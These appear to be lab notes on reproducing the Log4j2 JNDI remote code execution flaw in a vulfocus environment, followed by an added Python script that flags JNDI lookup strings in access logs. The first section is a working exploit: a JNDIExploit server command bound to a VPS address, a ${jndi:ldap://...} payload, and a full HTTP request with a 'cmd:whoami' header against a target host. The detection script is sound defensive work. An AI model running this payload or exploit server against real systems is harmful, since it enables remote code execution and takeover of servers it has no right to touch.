Apache Log4j2 Remote Code Execution Vulnerability

Tools

https://github.com/WhiteHSBG/JNDIExploit
Run with -u to view usage.

Reproduction (vulfocus)

Run the command on the VPS

  java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 101.35.17.6


payload

  ${jndi:ldap://101.35.17.6:1389/TomcatBypass/TomcatEcho}

  GET /hello?payload=%24%7bjndi%3aldap%3a%2f%2f101.35.17.6%3a1389%2ftomcatbypass%2ftomcatecho%7d HTTP/1.1
  Host: 123.58.224.8:33407
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  Accept-Encoding: gzip, deflate
  Connection: close
  Upgrade-Insecure-Requests: 1
  cmd:whoami
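
Detection (added example, not part of the original notes): a log check that percent-decodes each access-log line and flags the ${jndi:...} lookup string carried in the request above, reporting the scheme and the host:port it points to. The function names and the sample log lines are constructed for illustration and use documentation-range addresses.

```python
import re
from urllib.parse import unquote

# Start of a Log4j JNDI lookup, e.g. ${jndi:ldap://host:port/path}; matched case-insensitively
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^/}\s]+)", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Percent-decode until stable; logs written behind a proxy may be encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(log_line):
    """Return (scheme, host:port) for each JNDI lookup string found in one log line."""
    text = decode_fully(log_line)
    return [(m.group("scheme").lower(), m.group("target")) for m in JNDI_RE.finditer(text)]

def scan(lines):
    """Return (line_number, client_ip, hits) for every line that contains a lookup string."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = find_jndi_lookups(line)
        if hits:
            # First field of a combined-format access log line is the client address
            findings.append((n, line.split(" ", 1)[0], hits))
    return findings

# Constructed sample access-log lines (combined log format), not taken from a real server
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Sep/2022:10:00:01 +0000] "GET /hello?payload=%24%7bjndi%3aldap%3a%2f%2f203.0.113.10%3a1389%2ftomcatbypass%2ftomcatecho%7d HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [01/Sep/2022:10:00:05 +0000] "GET /hello?payload=test HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Sep/2022:10:00:09 +0000] "GET /hello?payload=%24%7BJNDI%3ALDAP%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip, hits in scan(SAMPLE_LOG):
        print(f"line {n}: client {ip} -> {hits}")
```

The reported host:port is the external server the application was told to contact, so it can be checked against outbound connection logs from the application host.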